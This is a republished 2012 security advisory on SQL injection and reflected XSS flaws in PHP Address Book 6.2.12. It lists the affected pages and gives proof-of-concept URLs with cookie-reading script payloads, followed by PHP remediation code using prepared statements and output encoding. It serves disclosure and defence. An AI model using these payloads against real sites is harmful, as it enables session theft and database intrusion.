PHP Address Book 6.2.12 multiple security flaws and fixes-vulnerability warning-the black bar safety net

2012-03-13T00:00:00
ID MYHACK58:62201233332
Type myhack58
Reporter Anonymous
Modified 2012-03-13T00:00:00

Description

Author: Stefan Schurtz

Affected Software: Successfully tested on PHP Address Book 6.2.12

Developer URL: http://sourceforge.net/projects/php-addressbook/

Defect description

==========================

PHP Address Book 6.2.12 contains multiple XSS and SQL injection issues.

==================

Proof of concept

==================

// Blind

http://www.badguest.cn/addressbook/edit.php?id=[sql-injection]

http://www.badguest.cn/addressbook/group.php?add=Add to&group=1&selected%5b%5d=1 3 2&to_group=[sql-injection]

http://[target]/addressbook/vcard.php?id=[sql-injection]

// XSS

http://[target]/addressbook/preferences.php?from='"</script><script>alert(document.cookie)</script>

http://[target]/addressbook/index.php?group='"</script><script>alert(document.cookie)</script>

Fix:

Filter the request parameters on each of the pages listed above (id, to_group, selected[], from and group) before they reach a query or the HTML output.
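The following is an added example of the filtering the fix calls for, written in PHP; it is not the PHP Address Book project's own code. The id-type parameters are validated as integers and bound in a prepared statement, and the reflected parameters are encoded for the context they are echoed into. The PDO handle, the table name `addressbook` and its `id` column are assumptions, since the advisory does not show the schema.

```php
<?php
// Added example, not code from PHP Address Book. Assumes a PDO connection
// $pdo and a table `addressbook` with an integer primary key `id`.
declare(strict_types=1);

// edit.php?id= / vcard.php?id= : treat id as an integer, never as SQL text.
function fetchEntryById(PDO $pdo, $rawId): ?array
{
    // Only a positive integer passes; "1 OR 1=1", "1'" and "1e3" are rejected.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller answers 400/404 instead of building a query
    }
    // Bound parameter: the value cannot change the structure of the query.
    $stmt = $pdo->prepare('SELECT * FROM addressbook WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// group.php?to_group= and selected[]= : same rule, applied to every value.
function toIntList(array $raw): array
{
    $ids = [];
    foreach ($raw as $v) {
        $n = filter_var($v, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($n !== false) {
            $ids[] = $n;
        }
    }
    return $ids;
}

// preferences.php?from= / index.php?group= : reflected into the page, so
// encode at output time for the context the value lands in.
// HTML body or attribute: ENT_QUOTES also escapes ' and ", which the
// advisory's payload relies on to break out of an attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Inside a <script> block (the payload closes a </script> tag, so the value
// appears to be reflected there): emit a JSON string literal with < > & ' "
// hex-escaped, so neither the tag nor the JS string can be closed early.
function js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Usage: echo '<input name="from" value="' . h($_GET['from'] ?? '') . '">';
//        echo '<script>var group = ' . js($_GET['group'] ?? '') . ';</script>';
```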